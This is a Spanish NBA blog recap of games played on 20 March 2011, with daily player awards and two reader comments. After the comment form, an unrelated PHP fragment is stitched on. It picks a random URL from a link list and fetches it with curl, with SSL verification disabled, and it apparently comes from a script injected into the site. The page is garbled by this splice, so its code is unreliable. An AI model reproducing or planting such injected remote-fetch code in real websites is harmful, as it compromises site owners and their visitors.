La Crónica (20/03/2011)

21 de March de 2011 por TheDeerHunter

¡Qué largo se está haciendo el final de la regular, sobre todo para algunos!

Crearte ilusiones si eres fan de los New York Knicks tiene esto: Que te las arrancan a mazazo limpio. Ayer les cayó una derrota más en Milwaukee con un Delfino que parecía la versión albiceleste de Larry Bird (95-100). Con un 5-5 que acumulan los Bucks en los últimos partidos parecen un cohete en ese tramo de la conferencia Este. A poco que se pongan van a adelantar a los Pacers y después vendrían los Knicks peleándose consigo mismos para mantener el 50% de victorias. Recordemos que unos Jazz bastante mediocres, undécimos de su conferencia, estarían ahora mismo por delante. La posibilidad de que peligre la posición de New York es remota. Muy mal se tendrían que empeñar en hacerlo aunque peores cosas se han visto en la franquicia, no lo olvidemos. Carmelo pide tiempo a una afición acostumbrada a que se abuse de su paciencia. Es comprensible que lo necesiten pero la sensación cada vez más imperante es que no ha habido un paso adelante. De momento vamos a ver si D’Antoni descifra quién es su center titular antes de que llegue su efímera hora de la verdad.

Paso atrás también para algunos otros. Menudo partidito se les escapó anoche a los Thunder ante Toronto (95-93). No estuvieron finos ni Durant ni Westbrook y la defensa tampoco fue la de otros días. Aún así tuvieron el partido en sus manos pero un Leandriño inspirado es capaz de armarla en un choque resuelto en el alambre. Los Mavs vuelven a coger distancias con su paliza a Golden State (73-101).

La zona caliente está, otra vez más, en la parte baja de playoffs en el Oeste. Ayer los Blazers le plantaron batalla a Lakers y como premio se llevaron la derrota y a Camby lesionado (80-84). Bynum no fue de la partida por aquella coz sin sentido que le pegó a Beasley el otro día pero Odom lo sustituyó de manera inmaculada. Los problemas interiores de los de Oregon hacen que no tengan la plaza ni mucho menos asegurada y es que Houston viene fuerte por detrás. Ayer ganaron a Utah a pesar del gran partido de Millsap y Jefferson (108-110). Lowry, con un triple doble, y Kevin Martin fueron demasiado para ellos. Además, Scola ha vuelto. Tampoco los Suns se dan por vencidos. Nash, por supuesto, y también Frye y Gortat (¡titular ya por dios!!) arañaron una victoria muy complicada en casa de los Clippers (108-99).

Finalmente los Hawks rompieron su racha negativa contra Detroit (96-104); los Wizards la suya contra los Nets (aunque lo de Deron al final no era tan grave, 92-98) y los Kings destrozaron a los Wolves ante la lesión de Love y pesar de la técnica descalificante a Demarcus Cousins (127-95).

PREMIOS

MVP: Primer triple doble en la carrera de Kyle Lowry, absolutamente esencial en la victoria de su equipo. 28 puntos, 11 rebotes y 10 asistencias para el ex-base de los Grizzlies.

Rookie: Buen partido de Greg Monroe (17 puntos y 10 rebotes) pero aún mejor de John Wall (23-6-8 y 4 robos). Estos dos jugadores van a ser muy buenos en los próximos años.

Sorpresa: Carlos Delfino debe ser de los jugadores más irregulares de la liga, capaz de anotar 7 triples en un partido y de fallar sus 7 intentos en el siguiente. Anoche tocó el partido bueno. 30 puntos y 10 rebotes con 6 de 11 en lanzamientos desde más allá de la línea de 3. A destacar también las 17 asistencias de Jordan Farmar.

Decepción: El Run&Gun de los Warriors se mojó anoche. Uno de los equipos más ofensivos del campeonato se quedó en 73 puntos, impropios de Ellis, Curry y compañía.

Esfuerzo en vano: La mejor actuación del día se queda sin premio. Paul Millsap hizo lo que quiso con el juego interior de los Rockets pero no fue suficiente. Sus 35 puntos (12 de 18), 10 rebotes, 4 asistencias y 3 tapones sembraron el pánico pero no otorgaron la victoria.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Como Lakers y Blazers se crucen en Playoffs y los partidos sean como estos dos últimos que han jugado tras el All Star, me van a matar. Qué manera de sufrir.

    A ver si se meten los Bucks y a Bogut le aguanta el cuerpo. Serían un rival más serio en primera ronda que los Pacers, todo lo serio que puede ser un equipo con un balance de 28-41, claro.

      Citar

  2. Denise dice:
    #2

    Los Pacers los veo mas equipo que los Bucks, aunque realmente da igual, pienso que el 5º y el 8º del Este no tienen nada que hacer ante el potencial de los 4 gallos del Este.
    Al contrario que en el Oeste, los Blazers y los Nuggets pueden dar mucha guerra. Si fuera de los Spurs estaría temblando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>